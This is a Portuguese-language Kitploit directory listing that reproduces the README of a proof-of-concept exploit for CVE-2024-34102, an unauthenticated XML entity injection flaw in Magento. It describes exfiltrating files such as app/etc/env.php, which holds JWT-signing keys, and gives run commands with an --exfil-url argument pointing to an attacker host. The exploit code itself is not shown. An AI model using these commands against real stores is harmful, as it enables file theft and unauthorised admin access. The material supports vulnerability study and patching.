Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2024-34102 — Uma demonstração de PoC, vulnerabilidade crítica de injeção de entidade XML no Magento | Kitploit
Ferramentas/GitHubGitHub/d0rb/cve-2024-34102
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de PenetraçãoAprendizado e Educação
GitHubd0rb/cve-2024-34102

CVE-2024-34102

Uma demonstração de PoC, vulnerabilidade crítica de injeção de entidade XML no Magento

Ver Repositório
2há 2 anosAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

🇮🇱 #BringThemHome #NeverAgainIsNow 🇮🇱

Exigimos o retorno seguro de todos os cidadãos que foram feitos reféns pelo grupo terrorista Hamas. Não descansaremos até que cada refém seja libertado e volte para casa em segurança. Você pode ajudar a trazê-los de volta. https://stories.bringthemhomenow.net/

CVE-2024-34102 PoC 🚀

Este repositório contém um exploit de prova de conceito (PoC) para a vulnerabilidade crítica de injeção de entidade XML (CVE-2024-34102) no Magento. Essa vulnerabilidade permite a exfiltração de arquivos sensíveis, que podem então ser usados para obter acesso não autorizado às funcionalidades administrativas do Magento. Este exploit foi projetado para fins educacionais e deve ser usado com responsabilidade.

Visão Geral 📖

O Magento é uma das soluções de e-commerce mais populares usadas globalmente. Em junho de 2024, foi descoberto um problema crítico de injeção de entidade XML sem autenticação prévia, identificado como CVE-2024-34102. Essa vulnerabilidade pode levar a consequências graves, incluindo a exfiltração do arquivo app/etc/env.php do Magento, que contém chaves criptográficas usadas para assinar JWTs.

Recursos 🌟

  • Exfiltrar arquivos sensíveis de uma instância vulnerável do Magento.
  • Uso simples e direto.
  • Demonstração educacional de injeção de entidade XML.

Uso 🚀

Pré-requisitos

  • Python 3.x
  • Biblioteca requests (pip install requests)

Executando o Exploit

  1. Clone o repositório:

    root@kitploit:~
    git clone https://github.com/yourusername/CVE-2024-34102-exploit.git
    cd CVE-2024-34102-exploit
    
  2. Execute o script com os argumentos necessários:

    root@kitploit:~
    python cve_2024_34102_exploit.py --target-url http://example.com --target-file /etc/hosts --exfil-url your_ip:9999
    

Argumentos de Linha de Comando

  • --target-url: A URL da instância alvo do Magento.
  • --target-file: O caminho do arquivo no servidor alvo a ser exfiltrado.
  • --exfil-url: A URL que receberá os dados exfiltrados.

Exemplo 🌐

root@kitploit:~
python cve_2024_34102_exploit.py --target-url http://example.com --target-file /etc/hosts --exfil-url your_ip:9999
Baixar ferramenta